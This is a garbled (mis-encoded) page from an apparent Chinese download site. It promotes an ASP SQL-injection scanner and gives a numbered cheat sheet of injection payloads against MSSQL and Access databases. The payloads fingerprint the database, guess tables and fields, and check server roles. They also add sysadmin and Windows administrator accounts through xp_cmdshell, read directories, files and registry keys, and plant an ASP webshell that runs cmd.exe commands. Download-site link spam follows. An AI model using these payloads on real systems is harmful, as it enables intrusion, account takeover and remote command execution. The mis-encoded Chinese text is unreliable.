±¾×¨Óù¤¾ß×÷ÓÃÊ®·ÖÇ¿¾¢£¬ÆÚ´ýѧÉúÃÇÓÃÒÔÕýµÀ£¬±ðÈ¥×öһЩΪ·Ç×÷´õµÄÈÃÈËÊ®·Ö¿É³ÜµÄʶù£¬ÓÉVBÓïÑÔ׫дµÄÍøÖ·Íøվ©¶´É¨ÃèרÓù¤¾ßµÄÃû×Ö£¬ASPÒýÈëÍøվ©¶´É¨ÃèרÓù¤¾ß£¬ÓÈÆäÔÚSQL ServerÒýÈë¼ìÑé²ãÃæÓзdz£¸ßµÄ׼ȷ¶È¡£
1.·Ö±æÊDz»ÊÇÓÐÒýÈë
;and 1=1
;and 1=2
2.·ÖÎöÅжÏÊDz»ÊÇmssql
;and user0
3.·Ö±æÊý¾Ý¿âϵͳÈí¼þ
;and (select count(*) from sysobjects)0 mssql
;and (select count(*) from msysobjects)0 access
4.ÒýÈëÖ÷Òª²ÎÊýÊDZêʶ·û
and [²éѯÌõ¼þ] and =
5.¼ìË÷ʱû¹ýÂÇÖ÷Òª²ÎÊýµÄ
and [²éѯÌõ¼þ] and %=
6.²ÂÊý¾Ý¿â
;and (Select Count(*) from [Êý¾Ý¿âÃû])0
7.²Â×Ö¶Î
;and (Select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0
8.²Â×Ö¶ÎÖмͼ³¤¶Ì
;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0
9.(1)²Â×ֶεÄasciiÖµ£¨access£©
;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0
(2)²Â×ֶεÄasciiÖµ£¨mssql£©
;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0
10.¼ì²â¹ÜÀíȨÏÞ¹¹Ô죨mssql£©
;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
;and 1=(SELECT IS_MEMBER(db_owner));--
11.¼ÓÉÏmssqlºÍÌåϵµÄÕ˺Å
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add
;--
;exec master.dbo.xp_cmdshell net user username
password /add;--
;exec master.dbo.xp_cmdshell net localgroup
administrators username /add;--
12.(1)½âÎöxmlÎļþĿ¼
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree c:\
;and (select top 1 paths from dirs)0
;and (select top 1 paths from dirs where paths not
in(Éϲ½»ñµÃµÄpaths)))
(2)½âÎöxmlÎļþĿ¼
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- µÃµ½µ±½ñÈ«²¿¿ØÖÆÆ÷
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- µÃµ½¸ùĿ¼Ŀ¼
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- µÃµ½È«²¿¸ùĿ¼µÄÎļþĿ¼Ê÷Ðνṹ
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- ²éѯ×ÊÁϵăÈÈÝ
13.mssqlÖеÄsqlÓï¾ä
xp_regenumvalues ×¢²á±íÎļþ¸ù¼ü, ×Ó¼ü
;exec xp_regenumvalues HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Run ÒԺü¸¸ö¼Ç¼¼¯·½·¨»Øµ½È«²¿¼üÖµ
xp_regread ¸ù¼ü,×Ó¼ü,¼üÖµÃû
;exec xp_regread HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
CommonFilesDir »Øµ½Öƶ©¼üµÄÖµ
xp_regwrite ¸ù¼ü,×Ó¼ü, ÖµÃû, ÖµÖÖÀà, Öµ
ÖµÖÖÀàÓÐ2ÖÖREG_SZ ±íÃ÷×Ö·ûÐÍ,REG_DWORD ±íÃ÷ÕûÐÎ
;exec xp_regwrite HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName,reg_sz,hello ÔØÈë×¢²á±íÎļþ
xp_regdeletevalue ¸ù¼ü,×Ó¼ü,ÖµÃû
exec xp_regdeletevalue HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName ɾµôijһֵ
xp_regdeletekey HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey Í˸ñ¼ü,°üº¬¸Ã¼üÏÂÈ«²¿Öµ
14.mssqlµÄbackup½¨Á¢webshell
use model
create table cmd(str image);
insert into cmd(str) values (% Dim oScript %);
backup database model to disk=c:\l.asp;
15.mssqlÄÚǶºÊý
;and (select @@version)0 µÃµ½WindowsµÄ°æ±¾ÐÅÏ¢
;and user_name()=dbo ·Ö±æµ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§ÊÇ·ñsa
;and (select user_name())0 ±¬µ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§
;and (select db_name())0 »ñµÃµ±½ñÁª½ÓµÄÊý¾Ý¿â
16.¼òÔ¼µÄwebshell
use model
create table cmd(str image);
insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);
backup database model to disk=g:\wwwtest\l.asp;
ÒªÇóµÄÇé¿öÏ£¬ÏñÕâÑù×ÓÓãº
l.asp?c=dir
Ïà¹Ø¹¥ÂÔ
ÎÞÏßÈëÇÖ¼ì²âϵͳ
Êý¾Ý¿âϵͳ·ÀºÚ¿ÍÈëÇÖ¼¼Êõ×ÛÊö
WEBÅÔ×¢ÈëÇÖ¼ì²âÍêȫʹÓÃÊÖ²á
ÈëÇÖ¼ì²âϵͳǿ´óµÄ¹¦ÄÜ¿ÉΪ±»±£»¤ÍøÂçÌṩÓÐÁ¦µÄÍøÂ簲ȫ±£ÕÏ£¬ÇëÎÊÒÔÏÂÄÄÒ»Ïî²»ÊôÓÚÈëÇÖ¼ì²âϵͳµÄ¹¦ÄÜ£¨£©
¡°ÍϿ⡱±¾À´ÊÇÊý¾Ý¿âÁìÓòµÄÊõÓָ´ÓÊý¾Ý¿âÖе¼³öÊý¾Ý£¬ÔÚÍøÂç¹¥»÷ÁìÓò£¬Ëü±»ÓÃÀ´Ö¸ÍøÕ¾Ôâµ½ÈëÇֺ󣬺ڿÍÇÔÈ¡ÆäÊý¾Ý¿âÎļþ¡£
ÈëÇÖ¼ì²âϵͳ¿ÉÒÔ·ÖΪ£¨£©ºÍ»ùÓÚÍøÂçÊý¾Ý°ü·ÖÎöÁ½ÖÖ»ù±¾·½Ê½£¨£©
accessÊý¾Ý¿â_accessÊý¾Ý¿âÐĵÃÌå»á_accessÊý¾Ý¿âÊÇʲôÐÍÊý¾Ý¿â
Êý¾Ý¿â±¸·Ý_Êý¾Ý¿â±¸·ÝÔõô×ö_Êý¾Ý¿â±¸·ÝÓë»Ö¸´
sqlÊý¾Ý¿â_sqlÊý¾Ý¿â°²×°½Ì³Ì_sqlÊý¾Ý¿â»ù´¡ÖªÊ¶
Êý¾Ý¿âÓÐÄÄЩ(Êý¾Ý¿â¶¼ÓÐÄÄЩ)
Ïà¹ØרÌâ
¶àÌØÊÖÓÎרÌâΪÄúÌṩ´¥ÊÖ¹ÖÈëÇÖÉíÌåÓÎÏ·°²×¿,а¶ñÓÂÕßÒ»Ðа²×¿ºº»¯¡£°²×¿Æ»¹û°æÒ»Ó¦¾ãÈ«,ÕÒ¾µäÊÖÓξÍÀ´¶àÌØÊÖ»úÓÎϷƵµÀÏÂÔØ!
¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿â¹¤¾ß,Êý¾Ý¿â²éѯ¹¤¾ß,Êý¾Ý¿âÁ¬½Ó¹¤¾ß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ
¶àÌØÈí¼þרÌâΪÄúÌṩÍøËÙ¼ì²â,ÍøËÙ¼ì²âÔÚÏß,ÊÖ»úÍøËÙ²âÊÔÔÚÏß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ
¶àÌØÈí¼þרÌâΪÄúÌṩÖ÷°å¼ì²â,Ö÷°å¼ì²âÈí¼þ,Ö÷°å¼ì²âºÃ»µ;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ
¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿âÈí¼þ,Ãâ·ÑÊý¾Ý¿âÈí¼þ,Êý¾Ý¿âÈí¼þÅÅÐÐ;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ
ͬÀàÅÅÐÐ
×î½ü¸üÐÂ
